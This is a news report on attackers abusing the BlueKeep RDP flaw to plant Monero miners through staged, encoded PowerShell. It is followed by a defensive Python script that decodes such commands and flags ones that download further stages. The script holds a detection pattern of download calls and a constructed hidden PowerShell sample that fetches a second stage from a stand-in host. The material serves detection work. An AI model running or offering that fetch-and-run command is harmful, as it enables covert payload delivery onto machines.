Recently, a cybersecurity researcher discovered that the BlueKeep vulnerability was back and was being used to remotely install a cryptominer on compromised machines.
Last June, Microsoft quickly released a patch for Windows XP and Windows 7 to contain the BlueKeep flaw, which could be used to achieve code execution on machines running Windows Remote Desktop Services (RDP). At the time, even the NSA was concerned about this flaw, which could "be exploited to conduct denial of service attacks."
A security researcher, Kevin Beaumont, found through a honeypot (EternalPot RDP) that the flaw was still active. In this case, however, it was not used to launch a DDoS attack, but only to install cryptominers on compromised machines through port 3389, the port used for remote connections via RDP. Once again, the cryptocurrency being mined was Monero (XMR), highly prized by hackers.
TWO ENCRYPTED POWERSHELL COMMANDS TO INSTALL THE CRYPTOMINER
The first details about this use of BlueKeep came from the blogger MalwareTech, who investigated crash dumps from the machines described by Kevin Beaumont. He declared in a tweet: "It looks like a #BlueKeep worm has finally arrived! Kevin kindly sent me a crash dump and after some investigation I found BlueKeep artifacts in memory and shellcode to drop a Monero Miner."
Source: tweet by MalwareTech (@MalwareTechBlog), November 2, 2019, https://t.co/7G88YAW5lr
According to his analysis, a first payload executes an encrypted PowerShell command, which downloads a second encrypted PowerShell script. The final payload installs a cryptominer dedicated to Monero (XMR). This cryptominer is detected by 25 of the 68 antivirus engines provided by the platform. Furthermore, we have written a complete tutorial about how hackers exploit the BlueKeep vulnerability.
MalwareTech indicates that this attack is not the work of a worm, but that it makes massive use of the BlueKeep flaw. Basically, this means that cybercriminals scan the internet to find vulnerable systems and install a cryptocurrency miner on them.
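A defender-side check for the staged PowerShell chain described above, as an added example (not code from MalwareTech or from this article). It assumes the "encrypted" commands are PowerShell -EncodedCommand arguments (Base64 over UTF-16LE); the function names, command lines and the example.invalid URL are constructed for illustration.

```python
import base64
import binascii
import re

# Any "-flag <base64>" pair; the flag itself is validated separately below.
FLAG_ARG = re.compile(r"\s[-/]([A-Za-z]+)\s+([A-Za-z0-9+/]{16,}={0,2})")
# Strings indicating that a decoded script fetches a further stage.
DOWNLOAD = re.compile(r"(?i)downloadstring|downloadfile|net\.webclient|invoke-webrequest|start-bitstransfer")

def is_encoded_flag(flag):
    """PowerShell accepts -EncodedCommand, any prefix of it (-e, -enc, ...) and -ec."""
    flag = flag.lower()
    return flag == "ec" or "encodedcommand".startswith(flag)

def decode_stage(blob):
    """Decode a Base64/UTF-16LE argument; return None if it is not in that form."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None

def analyze(cmdline, max_depth=3):
    """Return the decoded stages in a command line, following nested encoded commands."""
    stages, current = [], cmdline
    while len(stages) < max_depth and "powershell" in current.lower():
        hit = next(((f, b) for f, b in FLAG_ARG.findall(current) if is_encoded_flag(f)), None)
        script = decode_stage(hit[1]) if hit else None
        if script is None:
            break
        stages.append({"script": script, "downloads": bool(DOWNLOAD.search(script))})
        current = script
    return stages

def enc(text):
    """Helper used only to build the constructed samples below."""
    return base64.b64encode(text.encode("utf-16-le")).decode()

# Constructed process-creation command lines (assumption: not taken from the incident).
STAGE2 = "(New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
SAMPLES = [
    "powershell.exe -NoP -W Hidden -enc " + enc("powershell -e " + enc(STAGE2)),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "powershell.exe -EncodedCommand " + enc("Get-Date | Out-File C:\\temp\\d.txt"),
]

if __name__ == "__main__":
    for line in SAMPLES:
        stages = analyze(line)
        print("ALERT" if any(s["downloads"] for s in stages) else "ok", len(stages), line[:60])
```

Run over process-creation logs (for example, command lines recorded by endpoint telemetry), an encoded stage that decodes to a download call is the signal worth alerting on; encoded commands alone also appear in legitimate administration.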
It is therefore urgent to apply the patches released by Microsoft. Last July, up to 800,000 systems were vulnerable, according to BitSight.